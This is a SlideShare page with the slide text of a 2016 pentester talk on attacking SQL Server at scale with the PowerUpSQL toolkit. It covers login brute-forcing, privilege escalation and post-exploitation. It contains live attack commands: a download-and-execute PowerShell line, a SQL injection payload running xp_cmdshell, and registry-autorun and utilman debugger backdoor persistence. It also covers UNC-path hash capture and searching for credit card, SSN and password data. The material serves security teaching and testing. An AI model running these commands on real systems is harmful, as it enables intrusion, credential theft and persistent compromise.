Scott Sutherland, profile picture
Uploaded byScott Sutherland
PPTX, PDF1,887 views

2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)

The document provides a comprehensive overview of using PowerShell to hack SQL Server environments, led by Scott Sutherland. It covers methods for finding SQL servers, escalating privileges, post-exploitation activities, and tools like PowerUpSQL, detailing the techniques for privilege escalation from various user accounts. Additionally, it outlines common vulnerabilities such as weak passwords and impersonation risks, with recommendations for securing SQL servers.

Downloaded 75 times
1 / 107
2 / 107
3 / 107
4 / 107
5 / 107
6 / 107
7 / 107
8 / 107
9 / 107
10 / 107
11 / 107
12 / 107
13 / 107
14 / 107
15 / 107
16 / 107
17 / 107
18 / 107
19 / 107
20 / 107
21 / 107
22 / 107
23 / 107
24 / 107
25 / 107
26 / 107
27 / 107
28 / 107
29 / 107
30 / 107
31 / 107
32 / 107
33 / 107
34 / 107
35 / 107
36 / 107
37 / 107
38 / 107
39 / 107
40 / 107
41 / 107
42 / 107
43 / 107
44 / 107
45 / 107
46 / 107
47 / 107
48 / 107
49 / 107
50 / 107
51 / 107
52 / 107
53 / 107
54 / 107
55 / 107
56 / 107
57 / 107
58 / 107
59 / 107
60 / 107
61 / 107
62 / 107
63 / 107
64 / 107
65 / 107
66 / 107
67 / 107
68 / 107
69 / 107
70 / 107
71 / 107
72 / 107
73 / 107
74 / 107
75 / 107
76 / 107
77 / 107
78 / 107
79 / 107
80 / 107
81 / 107
82 / 107
83 / 107
84 / 107
85 / 107
86 / 107
87 / 107
88 / 107
89 / 107
90 / 107
91 / 107
92 / 107
93 / 107
94 / 107
95 / 107
96 / 107
97 / 107
98 / 107
99 / 107
100 / 107
101 / 107
102 / 107
103 / 107
104 / 107
105 / 107
106 / 107
107 / 107
Hacking SQL Server on Scale with PowerShell v.2
Speaker Information Name: Scott Sutherland Job: Network & Application Pentester @ NetSPI Twitter: @_nullbind Slides: http://slideshare.net/nullbind http://slideshare.net/netspi Blogs: https://blog.netspi.com/author/scott-sutherland/ Code: https://github.com/netspi/PowerUpSQL https://github.com/nullbind
Presentation Overview ● Why SQL Server and PowerShell? ● PowerUpSQL Overview ● Finding & Accessing SQL Servers ● Privilege Escalation Scenarios o Domain user to SQL Server login o SQL Server Login to Sysadmin o Sysadmin to Windows Admin o Windows Admin to Sysadmin o Domain Escalation ● Post Exploitation Activities ● General Recommendations
Why SQL Server? ● Used in most enterprise environments ● Supports local Windows and Domain authentication ● Integrates with lots of Windows applications ● Generally has trust relationships that other don’t
Why PowerShell? ● Native to Windows ● Run commands in memory ● Run managed .net code ● Run unmanaged code ● Avoid detection by legacy Anti-virus ● Already flagged as "trusted" by most application whitelist solutions ● A medium used to write many open source Pentest toolkits
PowerUpSQL
PowerUpSQL Overview: Project Goals Project Goals (Get-Abilities)  ● Scalability via runspace threading ● Flexibility via pipeline support ● ps objects and data tables ● Portability o No SMO dependancies o .Net Framework libraries o PowerShell v.2 compliant (in theory) o Single file Functional Goals ● Discover SQL Servers from different attacker perspectives ● Inventory SQL Servers quickly ● Audit SQL Servers for common insecure configurations ● Escalate privileges quickly on SQL Servers ● Support authentication using SQL Login or Windows Credential
PowerUpSQL Overview: Functions Primary Attack Functions ● Invoke-SQLDumpInfo ● Invoke-SQLAudit ● Invoke-SQLEscalatePriv ● Invoke-SQLOsCmd https://github.com/NetSPI/PowerUpSQL/wikiCurrently about 60 Functions
PowerUpSQL Overview: Where can I get it? Github https://github.com/netspi/PowerUpSQL PowerShell Gallery https://www.powershellgallery.com/packages/PowerUpSQL/
PowerUpSQL Overview: How do I install it? Github Import-Module PowerUpSQL.psd1 IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/P owerUpSQL.ps1") Execution policy work arounds https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ PowerShell Gallery Install-Module -Name PowerUpSQL
SQL Server Basics
SQL Server Basics What is SQL Server? ● A database platform ● An application ● A set of Windows services ● Each instance has its own set of services
SQL Server Basics: Account Types Account Types ● Windows Accounts o Used to login o Mapped to SQL Server login ● SQL Server Logins o Used to login o Mapped to database account ● Database Users o Used to access databases
SQL Server Basics: Common Roles Important SQL Server Roles ● Sysadmin role ○ Database administrator account ○ Think of it as the “Administrators” Windows group, but in SQL Server ● Public role ○ Only provides CONNECT permission ○ Think of it as the “Everyone” Windows group, but in SQL Server
Finding SQL Servers
Find SQL Servers: Techniques Attacker Perspective Attack Technique Unauthenticated ● List from file ● TCP port scan ● UDP port scan ● UDP broadcast ● Azure DNS dictionary attack (x.databases.windows.net) ● Azure DNS lookup via public resources Local User ● Services ● Registry entries Domain User ● Service Principal Names ● Azure Portal / PowerShell Modules
Find SQL Servers: PowerUpSQL Attacker Perspective PowerUpSQL Function Unauthenticated Get-SQLInstanceFile Unauthenticated Get-SQLInstanceUDPScan Local User Get-SQLInstanceLocal Domain User Get-SQLInstanceDomain Blog: https://blog.netspi.com/blindly-discover-sql-server-instances-powerupsql/
Escalating Privileges Unauthenticated / Domain User to SQL Login
Testing Login Access: Techniques What credentials can I use to log into discovered SQL Servers? Attacker Perspective Attack Technique Unauthenticated Dictionary attacks using common user names and passwords. Unauthenticated Default passwords based on the SQL Server instance names. Local Windows or ADS Domain Account Attempt to login using the current account.
Testing Login Access: PowerUpSQL CMDs What PowerUpSQL functions can I use to test for successful logins? Attack Technique PowerUpSQL Function Dictionary Attack Invoke-SQLAuditWeakLoginPw Default Password Test Invoke-SQLAuditDefaultLoginPw Get-SQLServerLoginDefaultPw Get-SQLInstanceDomain | Get-SQLServerLoginDefaultPw -Verbose Local Windows or ADS Domain Account Get-SQLConnectionTestThreaded
Testing Login Access: PowerUpSQL CMDs
Testing Login Access: Login CMD Examples Attacker Perspective Command Example Unauthenticated Get-SQLInstanceUDPScan | Get-SQLConnectionTestThreaded -Verbose -Threads 15 -Username testuser -Password testpass Local User Get-SQLInstanceLocal | Get-SQLConnectionTestThreaded -Verbose Domain User Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose -Threads 15 Alternative Domain User runas /noprofile /netonly /user:domainuser PowerShell.exe Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose -Threads 15
Testing Login Access: Reusing Result Lists Process Command Example Enumerate Accessible Servers $Accessible = Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose -Threads 15 | Where-Object {$_.Status –like “Accessible”} Get server information $Acessible | Get-SQLServerInfo -Verbose Get database list $Acessible | Get-SQLDatabase -Verbose Perform audit $Acessible | Invoke-SQLAudit -Verbose Do I have to rerun instance discovery every time I want to run a command? No.
Testing Login Access: Domain User Access DEMO
Testing Login Access: Demo DEMO
Escalating Privileges: Domain User Why can Domain Users login into so many SQL Servers? ● Admins give them access ● Privilege inheritance issue on domain systems = Public role access
Escalating Privileges: Domain User Why can Domain Users login into so many SQL Servers? ● Admins give them access ● Privilege inheritance issue on domain systems = Public role access
Escalating Privileges: Domain User Why can Domain Users login into so many SQL Servers? ● Admins give them access ● Privilege inheritance issue on domain systems = Public role access
Escalating Privileges SQL Login to SysAdmin
Escalating Privileges: Weak Passwords Didn’t we just cover this? Yes, but there’s more… Technique PowerUpSQL Function Dictionary Attack Invoke-SQLAuditWeakLoginPw Default Password Test Invoke-SQLAuditDefaultLoginPw Local Windows or ADS Domain Account Get-SQLConnectionTestThreaded
Escalating Privileges: Weak Passwords …we can also enumerate SQL Server logins and Domain Accounts  Technique PowerUpSQL Function Blind Login Enumeration + Dictionary Attack = Super Cool! Invoke-SQLAuditWeakLoginPw • Enumerate all SQL Server logins with the Public role • Enumerate all domain accounts with the Public role
Escalating Privileges: Weak Passwords Enumerating SQL Logins 1. Attempt to list all SQL Server logins and fail.
Escalating Privileges: Weak Passwords Enumerating SQL Logins 1. Attempt to list all SQL Server logins and fail. 2. Get principal id for the sa account with “suser_id”
Escalating Privileges: Weak Passwords Enumerating SQL Logins 1. Attempt to list all SQL Server logins and fail. 2. Get principal id for the sa account with “suser_id” 3. Use “suser_name” to get SQL logins using just principal ID
Escalating Privileges: Weak Passwords Enumerating SQL Logins 1. Attempt to list all SQL Server logins and fail. 2. Get principal id for the sa account with “suser_id” 3. Use “suser_name” to get SQL logins using just principal ID 4. Increment number and repeat
Escalating Privileges: Weak Passwords Enumerating SQL Logins 1. Attempt to list all SQL Server logins and fail. 2. Get principal id for the sa account with “suser_id” 3. Use “suser_name” to get SQL logins using just principal ID 4. Increment number and repeat select n [id], SUSER_NAME(n) [user_name] from ( select top 10000 row_number() over(order by t1.number) as N from master..spt_values t1 cross join master..spt_values t2 ) a where SUSER_NAME(n) is not null Code gifted from @mobileck Source: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges: Weak Passwords select n [id], SUSER_NAME(n) [user_name] from ( select top 10000 row_number() over(order by t1.number) as N from master..spt_values t1 cross join master..spt_values t2 ) a where SUSER_NAME(n) is not null Code gifted from @mobileck Source: https://gist.github.com/ConstantineK/c6de5d3 98ec43bab1a29ef07e8c21ec7
Escalating Privileges: Weak Passwords Enumerating Domain Users 1. Get the domain Domain of SQL Server
Escalating Privileges: Weak Passwords Enumerating Domain Users 1. Get the domain 2. GID RID of default group Full RID of Domain Admins group
Escalating Privileges: Weak Passwords Enumerating Domain Users 1. Get the domain 2. GID RID of default group 3. Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges: Weak Passwords Enumerating Domain Users 1. Get the domain 2. GID RID of default group 3. Grab the first 48 Bytes of the full RID 4. Create new RID with by appending a hex number value and the SID 1. Start with number, 500 2. Convert to hex, F401 3. Pad with 0 to 8 bytes, F4010000 4. Concatenate the SID and the new RID SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0 RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0F4010000
Escalating Privileges: Weak Passwords Enumerating Domain Users 1. Get the domain 2. GID RID of default group 3. Grab the first 48 Bytes of the full RID 4. Create new RID with by appending a hex number value and the SID 5. Use “suser_name” function to get domain object name 1. Start with number, 500 2. Convert to hex, F401 3. Pad with 0 to 8 bytes, F4010000 4. Concatenate the SID and the new RID SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0 RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0F4010000
Escalating Privileges: Weak Passwords Enumerating Domain Users 1. Get the domain 2. GID RID of default group 3. Grab the first 48 Bytes of the full RID 4. Create new RID with by appending a hex number value and the SID 5. Use “suser_name” function to get domain object name 6. Increment and repeat 1. Start with number, 500 2. Convert to hex, F401 3. Pad with 0 to 8 bytes, F4010000 4. Concatenate the SID and the new RID SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0 RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0F4010000
Escalating Privileges: DEMO DEMO Get-SQLFuzzServerLogin Invoke-SQLAuditWeakLoginPw Get-SQLFuzzDomainAccount
Escalating Privileges: Impersonation 1. Impersonate Privilege a. Server: EXECUTE AS LOGIN b. Database: EXECUTE AS USER 2. Stored Procedure and Trigger Creation / Injection Issues a. EXECUTE AS OWNER b. Signed with cert login 3. Automatic Execution of Stored Procedures 4. Agent Jobs 5. xp_cmdshell proxy acount 6. Create Databse Link to File or Server 7. Import / Install Custom Assemblies 8. Ad-Hoc Queries 9. Shared Service Accounts 10. Database Links 11. UNC Path Injection
Escalating Privileges: Impersonation Impersonate Privilege • Can be used at server layer o EXECUTE AS LOGIN • Can be used at database layer o EXECUTE AS USER Pros • Execute queries/commands in another user context Cons • Requires database to be configured as trustworthy for OS command execution • Commands and queries are not limited in any way
Escalating Privileges: Impersonation Impersonate Privilege • Can be used at server layer o EXECUTE AS LOGIN • Can be used at database layer o EXECUTE AS USER
Escalating Privileges: Impersonation Impersonate Privilege • Can be used at server layer o EXECUTE AS LOGIN • Can be used at database layer o EXECUTE AS USER
Escalating Privileges: Impersonation Stored Procedure and Trigger Creation / Injection Issues • EXECUTE AS OWNER can be used to execute a stored procedure as another login Pros • Can execute queries/commands in another user context • Limit commands and queries • Don’t have to grant IMPERSONATE Cons • No granular control over the database owner’s privileges • DB_OWNER role can EXECUTE AS OWNER of the DB, which is often a sysadmin • Requires database to be configured as trustworthy for OS command execution • Impersonation can be done via SQL injection under specific conditions • Impersonation can be done via command injection under specific conditions
Escalating Privileges: Impersonation Stored Procedure and Trigger Creation / Injection Issues • EXECUTE AS OWNER can be used to execute a stored procedure as another login • DB_OWNER role can impersonate the actual database owner USE MyAppDb GO CREATE PROCEDURE sp_escalate_me WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'MyAppUser','sysadmin' GO
Escalating Privileges: Impersonation Stored Procedure and Trigger Creation / Injection Issues • EXECUTE AS OWNER can be used to execute a stored procedure as another login • DB_OWNER role can impersonate the actual database owner USE MyAppDb GO CREATE PROCEDURE sp_escalate_me WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'MyAppUser','sysadmin' GO SYSADMIN is often the OWNER
Escalating Privileges: Impersonation Stored Procedure and Trigger Creation / Injection Issues • Use signed Procedures o Create stored procedure o Create a database master key o Create a certificate o Create a login from the certificate o Configure login privileges o Sign stored procedure with certifiate o GRANT EXECUTE to User Pros • Can execute queries/commands in another user context • Limit commands and queries • Don’t have to grant IMPERSONATE • Granular control over permissions • Database does NOT have to be configured as trustworthy for OS command execution Cons • Impersonation can be done via SQL injection under specific conditions • Impersonation can be done via command injection under specific conditions
Escalating Privileges: Impersonation SQL Injection Example CREATE PROCEDURE sp_sqli2 @DbName varchar(max) AS BEGIN Declare @query as varchar(max) SET @query = ‘ SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb'''; EXECUTE(@query) END GO https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
Escalating Privileges: Impersonation SQL Injection Example CREATE PROCEDURE sp_sqli2 @DbName varchar(max) AS BEGIN Declare @query as varchar(max) SET @query = ‘ SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb'''; EXECUTE(@query) END GO PURE EVIL https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
Escalating Privileges: Impersonation SQL Injection Example EXEC MASTER.dbo.sp_sqli2 'master'';EXEC master..xp_cmdshell ''whoami''--'; https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
Escalating Privileges: Impersonation SQL Injection Example
Escalating Privileges: Impersonation Automatic Execution of Stored Procedure • Stored procedures ca be configured to execute when the SQL Server service restarts Pros • Marking a stored procedure to run when the SQL Server service restarts has many use cases • Only stored procedures in the master database can be marked for auto execution Cons • No granular control over what context the startup command is executed in • All stored procedures marked for auto execution are executed as ‘sa’, even if ‘sa’ is disabled • Any non sysadmin access to stored procedures can lead to execution as ‘sa’
Escalating Privileges: DEMO DEMO Invoke-SQLAudit
Escalating Privileges: Invoke-SQLPrivEsc Whooray for Automation Demo!
Escalating Privileges: DEMO DEMO Invoke-SQLEscalatePriv
Escalating Privileges: Invoke-SQLPrivEsc DEMO
Escalating Privileges SysAdmin to Service Account
Escalating Privileges: SysAdmin to Service Account OS Command Execution = Service Account Impersonation Executing OS Commands: ● xp_cmdshell ● Custom Assemblies (.net) ● Custom Extended Stored Procedures (C++) ● Agent Jobs o ActiveX: Vbscript, Jscript, and Other o CmdExec o PowerShell o SSIS Package ● Registry Autoruns ● File Autoruns
Escalating Privileges: SysAdmin to Service Account OS Command Execution = Service Account Impersonation You don’t need to know the password, crack a hash, or PTH Service Account Types ● Local User ● Local System ● Network Service ● Local managed service account ● Domain managed service account ● Domain User ● Domain Admin
Escalating Privileges: SysAdmin to Service Account But wait, there’s more…RottenPotato @ DerbyCon 2016 - Authors: Chris Mallz (@vvalien1) & Steve Breen (@breenmachine) - We can now escalation from service account to LocalSystem! - No patch that I’m aware of. Check out their blog for details: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege- escalation-from-service-accounts-to-system/
Escalating Privileges: Invoke-SQLOSCmd Invoke-SQLOSCMD can be used for basic command execution. PS C:>$Accessible | Invoke-SQLOSCmd –Verbose –Command “whoami” –Threads 10 ComputerName Instance CommandResults --------------------- ----------- -------------- SQLServer1 SQLServer1SQLEXPRESS nt servicemssql$sqlexpress SQLServer1 SQLServer1STANDARDDEV2014 nt authoritysystem SQLServer1 SQLServer1 DomainSQLSvc
Escalating Privileges Shared Service Accounts
Escalating Privileges: Shared Service Accounts Why should I care about shared service accounts? 1. SysAdmins can execute OS commands 2. OS commands run as the SQL Server service account 3. Service accounts have sysadmin privileges by default 4. Companies often use a single domain account to run hundreds of SQL Servers 5. So if you get sysadmin on one server you have it on all of them! One account to rule them all!
InternetDMZIntranet LRA HVA LVA ADS LVA Ports 80 and 443 Ports 1433 and 1434 HVA PURE EVIL Key HVA = High Value Application LVA = Low Value Application Leveraging Shared MS SQL Server Service Accounts
InternetDMZIntranet LRA HVA LVA ADS LVA Ports 80 and 443 Ports 1433 and 1434 HVA PURE EVIL Captain Evil SQL Injection 1 Key HVA = High Value Application LVA = Low Value Application Leveraging Shared MS SQL Server Service Accounts
InternetDMZIntranet LRA HVA LVA ADS LVA Ports 80 and 443 Ports 1433 and 1434 HVA PURE EVIL Captain Evil SQL Injection 1 Execute Local Command via xp_cmdshell 2 Key HVA = High Value Application LVA = Low Value Application Leveraging Shared MS SQL Server Service Accounts
InternetDMZIntranet LRA HVA LVA ADS LVA Ports 80 and 443 Ports 1433 and 1434 HVA PURE EVIL Captain Evil SQL Injection 1 Execute Local Command via xp_cmdshell 2 Access to HVA with shared domain service account Key HVA = High Value Application LVA = Low Value Application Execute commands and gather data from other database servers via osql 3 Leveraging Shared MS SQL Server Service Accounts
Escalating Privileges Crawling Server Links
Escalating Privileges: Crawling Server Links What’s a database link? ● Database links are basically persistent database connections for SQL Servers. Why should I care? ● Short answer = privilege escalation ● Public role can use links to execute queries on remote servers (impersonation) SELECT * FROM OpenQuery([SQLSERVER2],’SELECT @@Version’) ● Stored procedures can be executed (xp_cmdshell) ● Links can be crawled
InternetDMZIntranet LRA HVA LVA ADS Ports 80 and 443 Ports 1433 and 1434 HVA PURE EVIL Captain EvilKey HVA = High Value Application LVA = Low Value Application Leveraging MS SQL Database links DB1 LVA
InternetDMZIntranet LRA HVA LVA ADS Ports 80 and 443 Ports 1433 and 1434 HVA PURE EVIL Captain Evil SQL Injection 1 Key HVA = High Value Application LVA = Low Value Application Leveraging MS SQL Database links DB1 LVA
InternetDMZIntranet LRA HVA LVA ADS Ports 80 and 443 Ports 1433 and 1434 HVA PURE EVIL Captain Evil SQL Injection 1 Key HVA = High Value Application LVA = Low Value Application Leveraging MS SQL Database links D B Link w ith LeastPrivileges DB1 LVA
InternetDMZIntranet LRA HVA LVA ADS Ports 80 and 443 Ports 1433 and 1434 HVA PURE EVIL Captain Evil SQL Injection 1 Key HVA = High Value Application LVA = Low Value Application Leveraging MS SQL Database links D B Link w ith LeastPrivileges DB Link with SA account DB1 LVA Execute SQL queries and local commands on database servers via nested linked services 2
Escalating Privileges: Crawling Server Links Penetration Test Stats ● Database links exist (and can be crawled) in about 50% of environments we’ve seen ● The max number of hops we’ve seen is 12 ● The max number of servers crawled is 226
Escalating Privileges: Crawling Server Links Old Script ● 2012 - https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler New Script ● /scripts/pending/Get-SqlServerLinkCrawl.ps1 ● Author: Antti Rantasaari
Escalating Privileges: Crawling Server Links DEMO
Escalating Privileges: Database Links DEMO
Escalating Privileges: Crawling Server Links
Escalating Privileges UNC Path Injection
Escalating Privileges: UNC Path Injection UNC Path Injection Summary ● UNC paths are used for accessing remote file servers like so 192.168.1.4file ● Almost all procedures that accept a file path in SQL Server, support UNC paths ● UNC paths can be used to force the SQL Server service account to authenticate to an attacker ● An attacker can then capture the NetNTLM password hash and crack or relay it ● Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges: UNC Path Injection
Escalating Privileges: UNC Path Injection Oh yeah… By DEFAULT, the PUBLIC role can execute (at least) two procedures that accept a file path xp_dirtree xp_fileexists
Escalating Privileges: UNC Path Injection So, in summary… The PUBLIC role can access the SQL Server service account NetNTLM password hash by default!!
Escalating Privileges: UNC Path Injection But who really has PUBLIC role access? Oh yeah, a ton of domain users 
Escalating Privileges: DEMO DEMO Get-SQLServiceAccountPwHashes …what? It’s self descriptive 
Escalating Privileges: UNC Path Injection DEMO
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges: OS Admin to SysAdmin Two things to know… 1. Different SQL Server versions can be abused in different ways 2. All SQL Server versions provide the service account with sysadmin privileges.
Escalating Privileges: OS Admin to SysAdmin Approach 2000 2005 2008 2012 2014 2016 LSA Secrets x x x x x x Local Administrator x x LocalSystem x x x Process Migration x x x x x x Token Stealing x x x x x X Single User Mode ? x x x x x Below are some options for leveraging that knowledge...
Escalating Privileges: OS Admin to SysAdmin Here are some tool options... Approach Common Tools Access as Local Administrator Management Studio, sqlcmd, and other native SQL client tools. Access as LocalSystem Psexec, accessibility options, debugger with native SQL client tools. Recover SQL Server service account password from LSA Secrets Mimikatz, Metasploit, lsadump. Inject shellcode or DLL into the SQL Server service process Metasploit, Empire, Python, Powershell, C, C++ (LoadLibrary,CreateRemoteThread, and similar functions) Steal Authentication Token From SQL Server service process Metasploit, Incognito, Invoke-TokenManipulation Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation: Overview Common Post Exploitation Activities 1. Establish Persistence • SQL Server Layer: startup procedures, agent jobs, triggers, modified code • OS Layer: Registry & file auto runs, tasks, services, etc. 2. Identify Sensitive Data • Target large databases • Locate transparently encrypted databases • Search columns based on keywords and sample data • Use regular expressions and the Luhn formula against data samples 3. Exfiltrate Sensitive Data • All standard methods: Copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
Post Exploitation: Persistence Task Command Example Registry Autorun Persistence Get-SQLPersistRegRun -Verbose -Name EvilSauce -Command "EvilBoxEvilSandwich.exe" -Instance "SQLServer1STANDARDDEV2014" Debugger Backdoor Persistence Get-SQLPersistRegDebugger -Verbose -FileName utilman.exe -Command 'c:windowssystem32cmd.exe' -Instance "SQLServer1STANDARDDEV2014"
Post Exploitation: Persistence
Post Exploitation: Finding Sensitive Data Task Command Example Locate Encrypted Databases Get-SQLInstanceDomain -Verbose | Get-SQLDatabaseThreaded –Verbose –Threads 10 -NoDefaults | Where-Object {$_.is_encrypted –eq “TRUE”} Locate and Sample Sensitive Columns and Export to CSV Get-SQLInstanceDomain -Verbose | Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword “credit,ssn,password” –SampleSize 2 –ValidateCC –NoDefaults | Export-CSV –NoTypeInformation c:tempdatasample.csv
Post Exploitation: Finding Sensitive Data DEMO
Post Exploitation: Finding Sensitive Data DEMO
General Recommendations
General Recommendations Things to do… 1. Enforce least privilege everywhere! 2. Disable dangerous default stored procedures. 3. Audit and fix insecure configurations. 4. Use policy based management for standardizing configurations. 5. Enable auditing at the server and database levels, and monitor for potentially malicious activity.
PowerUpSQL Overview: Thanks! Individual Third Party Code / Direct Contributors Boe Prox Runspace blogs Warren F. ( RamblingCookieMonster) Invoke-Parallel function Oyvind Kallstad Test-IsLuhnValid function Kevin Robertson Invoke-Inveigh Joe Bialek Invoke-TokenManipulation Antti Rantasaari, Eric Gruber, and Alexander Leary, @leoloobeek, and @ktaranov Contributions and QA Khai Tran Design advice NetSPI assessment team and dev team Design advice
Speaker Information Name: Scott Sutherland Job: Network & Application Pentester @ NetSPI Twitter: @_nullbind Slides: http://slideshare.net/nullbind http://slideshare.net/netspi Blogs: https://blog.netspi.com/author/scott-sutherland/ Code: https://github.com/netspi/PowerUpSQL https://github.com/nullbind

More Related Content

PPTX
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
byScott Sutherland
 
PDF
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
byScott Sutherland
 
PPTX
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
byScott Sutherland
 
PPTX
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
byScott Sutherland
 
PDF
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
byScott Sutherland
 
PPTX
2019 Blackhat Booth Presentation - PowerUpSQL
byScott Sutherland
 
PPTX
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
byScott Sutherland
 
PDF
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
byScott Sutherland
 
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
byScott Sutherland
 
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
byScott Sutherland
 
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
byScott Sutherland
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
byScott Sutherland
 
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
byScott Sutherland
 
2019 Blackhat Booth Presentation - PowerUpSQL
byScott Sutherland
 
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
byScott Sutherland
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
byScott Sutherland
 

What's hot

PPTX
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
byScott Sutherland
 
PPTX
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
byScott Sutherland
 
PPTX
Beyond XP_CMDSHELL: Owning the Empire Through SQL Server
byNetSPI
 
PPTX
Beyond xp_cmdshell: Owning the Empire through SQL Server
byScott Sutherland
 
PDF
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
byScott Sutherland
 
PPTX
Secure360 - Extracting Password from Windows
byScott Sutherland
 
PDF
Slides Cassandra
byhamidd77
 
PPTX
Codemotion 2013: Feliz 15 aniversario, SQL Injection
byChema Alonso
 
PPTX
How to do everything with PowerShell
byJuan Carlos Gonzalez
 
PPTX
PowerUp - Automating Windows Privilege Escalation
byWill Schroeder
 
PDF
Training Slides: 302 - Securing Your Cluster With SSL
byContinuent
 
PDF
The Play Framework at LinkedIn
byYevgeniy Brikman
 
PPTX
Nagios Conference 2014 - Jeff Mendoza - Monitoring Microsoft Azure with Nagios
byNagios
 
PPTX
How to scheduled jobs in a cloudera cluster without oozie
byTiago Simões
 
PDF
Hardening cassandra q2_2016
byzznate
 
ODP
Nagios Conference 2014 - Troy Lea - Monitoring VMware Virtualization Using vMA
byNagios
 
PPTX
How to implement a gdpr solution in a cloudera architecture
byTiago Simões
 
PDF
Dynamic Database Credentials: Security Contingency Planning
bySean Chittenden
 
PDF
Oracle security 02-administering user security
byZhaoyang Wang
 
PDF
Software Development with Apache Cassandra
byzznate
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
byScott Sutherland
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
byScott Sutherland
 
Beyond XP_CMDSHELL: Owning the Empire Through SQL Server
byNetSPI
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
byScott Sutherland
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
byScott Sutherland
 
Secure360 - Extracting Password from Windows
byScott Sutherland
 
Slides Cassandra
byhamidd77
 
Codemotion 2013: Feliz 15 aniversario, SQL Injection
byChema Alonso
 
How to do everything with PowerShell
byJuan Carlos Gonzalez
 
PowerUp - Automating Windows Privilege Escalation
byWill Schroeder
 
Training Slides: 302 - Securing Your Cluster With SSL
byContinuent
 
The Play Framework at LinkedIn
byYevgeniy Brikman
 
Nagios Conference 2014 - Jeff Mendoza - Monitoring Microsoft Azure with Nagios
byNagios
 
How to scheduled jobs in a cloudera cluster without oozie
byTiago Simões
 
Hardening cassandra q2_2016
byzznate
 
Nagios Conference 2014 - Troy Lea - Monitoring VMware Virtualization Using vMA
byNagios
 
How to implement a gdpr solution in a cloudera architecture
byTiago Simões
 
Dynamic Database Credentials: Security Contingency Planning
bySean Chittenden
 
Oracle security 02-administering user security
byZhaoyang Wang
 
Software Development with Apache Cassandra
byzznate
 

Viewers also liked

PDF
Attack All the Layers: What's Working during Pentests (OWASP NYC)
byScott Sutherland
 
PPTX
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
byNikhil Mittal
 
PPTX
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
byScott Sutherland
 
PPT
Databases
byScott Sutherland
 
PPT
Windows: Having its ass kicked by Puppet and Powershell since 2012 #PuppetConf
byPaul Stack
 
PPTX
PASS VC: SQL Server Performance Monitoring and Baselining
byPARIKSHIT SAVJANI
 
PPTX
Outlook and Exchange for the bad guys
byNick Landers
 
PDF
Up is Down, Black is White: Using SCCM for Wrong and Right
byenigma0x3
 
PDF
Hadoop Security
byTimothy Spann
 
PPTX
The Travelling Pentester: Diaries of the Shortest Path to Compromise
byWill Schroeder
 
PDF
AntiVirus Evasion Reconstructed - Veil 3.0
byCTruncer
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
byScott Sutherland
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
byNikhil Mittal
 
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
byScott Sutherland
 
Databases
byScott Sutherland
 
Windows: Having its ass kicked by Puppet and Powershell since 2012 #PuppetConf
byPaul Stack
 
PASS VC: SQL Server Performance Monitoring and Baselining
byPARIKSHIT SAVJANI
 
Outlook and Exchange for the bad guys
byNick Landers
 
Up is Down, Black is White: Using SCCM for Wrong and Right
byenigma0x3
 
Hadoop Security
byTimothy Spann
 
